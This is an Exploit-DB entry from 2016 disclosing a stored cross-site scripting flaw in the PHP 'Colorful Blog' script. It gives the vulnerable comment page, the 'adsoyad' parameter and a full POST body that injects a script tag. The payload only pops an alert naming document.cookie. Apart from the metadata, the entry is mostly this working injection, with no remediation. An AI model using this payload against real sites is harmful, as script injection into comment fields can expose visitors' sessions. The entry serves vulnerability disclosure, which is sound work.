Colorful Blog - Persistent Cross-Site Scripting

EDB-ID:

40526

CVE:

N/A


Author:

Besim

Type:

webapps


Platform:

PHP

Date:

2016-10-13


# Exploit Title : ----------- : Colorful Blog - Stored Cross Site Scripting
# Author : -----------------  : Besim
# Google Dork : ---------  :    -
# Date : -------------------- : 13/10/2016
# Type : -------------------- : webapps
# Platform : --------------- : PHP  
# Vendor Homepage :-- : -
# Software link : --------- : http://wmscripti.com/php-scriptler/colorful-blog-scripti.html


Description : 

# Vulnerable link : http://site_name/path/single.php?kat=kat&url='post_name'

*-*-*-*-*-*-*-*-* Stored XSS Payload *-*-*-*-*-*-*-*-* 

*-* Vulnerable URL : http://site_name/path/single.php?kat=kat&url='post_name'    ---   Post comment section
*-* Vuln. Parameter : adsoyad
*-* POST DATA        :  adsoyad=<script>alert('document.cookie')</script>&email=besim@yopmail.com&web=example.com&mesaj=Nice, blog post